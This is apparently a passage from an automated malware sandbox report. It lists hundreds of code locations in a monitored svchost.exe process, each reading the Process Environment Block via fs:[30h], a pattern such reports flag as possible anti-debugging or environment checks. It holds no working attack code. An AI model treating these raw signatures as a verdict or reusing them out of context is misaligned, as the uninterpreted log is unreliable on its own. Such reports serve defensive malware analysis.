                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A351ED mov eax, dword ptr fs:[00000030h]13_2_03A351ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B061E5 mov eax, dword ptr fs:[00000030h]13_2_03B061E5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A601F8 mov eax, dword ptr fs:[00000030h]13_2_03A601F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF61C3 mov eax, dword ptr fs:[00000030h]13_2_03AF61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF61C3 mov eax, dword ptr fs:[00000030h]13_2_03AF61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6D1D0 mov eax, dword ptr fs:[00000030h]13_2_03A6D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6D1D0 mov ecx, dword ptr fs:[00000030h]13_2_03A6D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B051CB mov eax, dword ptr fs:[00000030h]13_2_03B051CB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A60124 mov eax, dword ptr fs:[00000030h]13_2_03A60124
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A31131 mov eax, dword ptr fs:[00000030h]13_2_03A31131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A31131 mov eax, dword ptr fs:[00000030h]13_2_03A31131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov ecx, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov eax, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov eax, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov eax, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF0115 mov eax, dword ptr fs:[00000030h]13_2_03AF0115
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC9179 mov eax, dword ptr fs:[00000030h]13_2_03AC9179
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05152 mov eax, dword ptr fs:[00000030h]13_2_03B05152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov ecx, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A37152 mov eax, dword ptr fs:[00000030h]13_2_03A37152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2C156 mov eax, dword ptr fs:[00000030h]13_2_03A2C156
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A36154 mov eax, dword ptr fs:[00000030h]13_2_03A36154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A36154 mov eax, dword ptr fs:[00000030h]13_2_03A36154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF60B8 mov eax, dword ptr fs:[00000030h]13_2_03AF60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]13_2_03AF60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3208A mov eax, dword ptr fs:[00000030h]13_2_03A3208A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2D08D mov eax, dword ptr fs:[00000030h]13_2_03A2D08D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A35096 mov eax, dword ptr fs:[00000030h]13_2_03A35096
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5D090 mov eax, dword ptr fs:[00000030h]13_2_03A5D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5D090 mov eax, dword ptr fs:[00000030h]13_2_03A5D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6909C mov eax, dword ptr fs:[00000030h]13_2_03A6909C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A550E4 mov eax, dword ptr fs:[00000030h]13_2_03A550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A550E4 mov ecx, dword ptr fs:[00000030h]13_2_03A550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]13_2_03A2A0E3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A380E9 mov eax, dword ptr fs:[00000030h]13_2_03A380E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]13_2_03A2C0F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A720F0 mov ecx, dword ptr fs:[00000030h]13_2_03A720F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B050D9 mov eax, dword ptr fs:[00000030h]13_2_03B050D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB20DE mov eax, dword ptr fs:[00000030h]13_2_03AB20DE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A590DB mov eax, dword ptr fs:[00000030h]13_2_03A590DB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A020 mov eax, dword ptr fs:[00000030h]13_2_03A2A020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2C020 mov eax, dword ptr fs:[00000030h]13_2_03A2C020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]13_2_03AF903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]13_2_03AF903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]13_2_03AF903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]13_2_03AF903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]13_2_03A4E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]13_2_03A4E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]13_2_03A4E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]13_2_03A4E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05060 mov eax, dword ptr fs:[00000030h]13_2_03B05060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov ecx, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]13_2_03A41070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5C073 mov eax, dword ptr fs:[00000030h]13_2_03A5C073
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A32050 mov eax, dword ptr fs:[00000030h]13_2_03A32050
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AD705E mov ebx, dword ptr fs:[00000030h]13_2_03AD705E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AD705E mov eax, dword ptr fs:[00000030h]13_2_03AD705E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B052 mov eax, dword ptr fs:[00000030h]13_2_03A5B052
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB97A9 mov eax, dword ptr fs:[00000030h]13_2_03AB97A9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]13_2_03ABF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]13_2_03ABF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]13_2_03ABF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]13_2_03ABF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]13_2_03ABF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B037B6 mov eax, dword ptr fs:[00000030h]13_2_03B037B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A307AF mov eax, dword ptr fs:[00000030h]13_2_03A307AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5D7B0 mov eax, dword ptr fs:[00000030h]13_2_03A5D7B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]13_2_03A2F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF78A mov eax, dword ptr fs:[00000030h]13_2_03AEF78A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3D7E0 mov ecx, dword ptr fs:[00000030h]13_2_03A3D7E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A527ED mov eax, dword ptr fs:[00000030h]13_2_03A527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A527ED mov eax, dword ptr fs:[00000030h]13_2_03A527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A527ED mov eax, dword ptr fs:[00000030h]13_2_03A527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A347FB mov eax, dword ptr fs:[00000030h]13_2_03A347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A347FB mov eax, dword ptr fs:[00000030h]13_2_03A347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]13_2_03A3C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A357C0 mov eax, dword ptr fs:[00000030h]13_2_03A357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A357C0 mov eax, dword ptr fs:[00000030h]13_2_03A357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A357C0 mov eax, dword ptr fs:[00000030h]13_2_03A357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF72E mov eax, dword ptr fs:[00000030h]13_2_03AEF72E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A33720 mov eax, dword ptr fs:[00000030h]13_2_03A33720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4F720 mov eax, dword ptr fs:[00000030h]13_2_03A4F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4F720 mov eax, dword ptr fs:[00000030h]13_2_03A4F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4F720 mov eax, dword ptr fs:[00000030h]13_2_03A4F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF972B mov eax, dword ptr fs:[00000030h]13_2_03AF972B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6C720 mov eax, dword ptr fs:[00000030h]13_2_03A6C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6C720 mov eax, dword ptr fs:[00000030h]13_2_03A6C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]13_2_03B0B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]13_2_03B0B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]13_2_03B0B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]13_2_03B0B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29730 mov eax, dword ptr fs:[00000030h]13_2_03A29730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29730 mov eax, dword ptr fs:[00000030h]13_2_03A29730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A65734 mov eax, dword ptr fs:[00000030h]13_2_03A65734
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3973A mov eax, dword ptr fs:[00000030h]13_2_03A3973A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3973A mov eax, dword ptr fs:[00000030h]13_2_03A3973A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6273C mov eax, dword ptr fs:[00000030h]13_2_03A6273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6273C mov ecx, dword ptr fs:[00000030h]13_2_03A6273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6273C mov eax, dword ptr fs:[00000030h]13_2_03A6273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AAC730 mov eax, dword ptr fs:[00000030h]13_2_03AAC730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A37703 mov eax, dword ptr fs:[00000030h]13_2_03A37703
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A35702 mov eax, dword ptr fs:[00000030h]13_2_03A35702
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A35702 mov eax, dword ptr fs:[00000030h]13_2_03A35702
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6C700 mov eax, dword ptr fs:[00000030h]13_2_03A6C700
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A30710 mov eax, dword ptr fs:[00000030h]13_2_03A30710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A60710 mov eax, dword ptr fs:[00000030h]13_2_03A60710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6F71F mov eax, dword ptr fs:[00000030h]13_2_03A6F71F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6F71F mov eax, dword ptr fs:[00000030h]13_2_03A6F71F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]13_2_03A2B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]13_2_03A2B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]13_2_03A2B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]13_2_03A2B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A38770 mov eax, dword ptr fs:[00000030h]13_2_03A38770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]13_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A43740 mov eax, dword ptr fs:[00000030h]13_2_03A43740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A43740 mov eax, dword ptr fs:[00000030h]13_2_03A43740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A43740 mov eax, dword ptr fs:[00000030h]13_2_03A43740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6674D mov esi, dword ptr fs:[00000030h]13_2_03A6674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6674D mov eax, dword ptr fs:[00000030h]13_2_03A6674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6674D mov eax, dword ptr fs:[00000030h]13_2_03A6674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A30750 mov eax, dword ptr fs:[00000030h]13_2_03A30750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72750 mov eax, dword ptr fs:[00000030h]13_2_03A72750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72750 mov eax, dword ptr fs:[00000030h]13_2_03A72750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B03749 mov eax, dword ptr fs:[00000030h]13_2_03B03749
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB4755 mov eax, dword ptr fs:[00000030h]13_2_03AB4755
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]13_2_03A6C6A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2D6AA mov eax, dword ptr fs:[00000030h]13_2_03A2D6AA
